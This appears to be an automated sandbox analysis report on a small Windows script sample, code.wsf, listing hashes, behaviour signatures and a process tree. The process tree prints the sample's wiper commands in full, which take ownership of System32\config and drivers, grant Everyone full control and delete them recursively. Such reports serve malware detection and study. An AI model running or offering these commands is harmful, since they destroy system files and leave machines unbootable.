Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:42
Static task
static1
Behavioral task
behavioral1
Sample
code.wsf
Resource
win7-20240729-en
General
-
Target
code.wsf
-
Size
3KB
-
MD5
57a8ed12915b612b81ec573f56394818
-
SHA1
f834294e6d6a7150da076670825857960df8a7a2
-
SHA256
0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
-
SHA512
2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exepid process 1812 icacls.exe 2628 takeown.exe 2156 takeown.exe 2332 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exepid process 2156 takeown.exe 2332 icacls.exe 1812 icacls.exe 2628 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2156 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2108 wrote to memory of 2356 2108 cmd.exe WScript.exe PID 2108 wrote to memory of 2356 2108 cmd.exe WScript.exe PID 2108 wrote to memory of 2356 2108 cmd.exe WScript.exe PID 2356 wrote to memory of 1616 2356 WScript.exe cmd.exe PID 2356 wrote to memory of 1616 2356 WScript.exe cmd.exe PID 2356 wrote to memory of 1616 2356 WScript.exe cmd.exe PID 2356 wrote to memory of 1856 2356 WScript.exe cmd.exe PID 2356 wrote to memory of 1856 2356 WScript.exe cmd.exe PID 2356 wrote to memory of 1856 2356 WScript.exe cmd.exe PID 1616 wrote to memory of 2628 1616 cmd.exe takeown.exe PID 1616 wrote to memory of 2628 1616 cmd.exe takeown.exe PID 1616 wrote to memory of 2628 1616 cmd.exe takeown.exe PID 1856 wrote to memory of 2156 1856 cmd.exe takeown.exe PID 1856 wrote to memory of 2156 1856 cmd.exe takeown.exe PID 1856 wrote to memory of 2156 1856 cmd.exe takeown.exe PID 1616 wrote to memory of 2332 1616 cmd.exe icacls.exe PID 1616 wrote to memory of 2332 1616 cmd.exe icacls.exe PID 1616 wrote to memory of 2332 1616 cmd.exe icacls.exe PID 1856 wrote to memory of 1812 1856 cmd.exe icacls.exe PID 1856 wrote to memory of 1812 1856 cmd.exe icacls.exe PID 1856 wrote to memory of 1812 1856 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2628
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1812
-
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵PID:2268
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD557a8ed12915b612b81ec573f56394818
SHA1f834294e6d6a7150da076670825857960df8a7a2
SHA2560461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA5122bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68
-
Filesize
77B
MD51fafd3091b9297603ea9989bed793089
SHA103688ce88040e39d04ec4a182427cf0992c827d6
SHA25684a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA5128273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d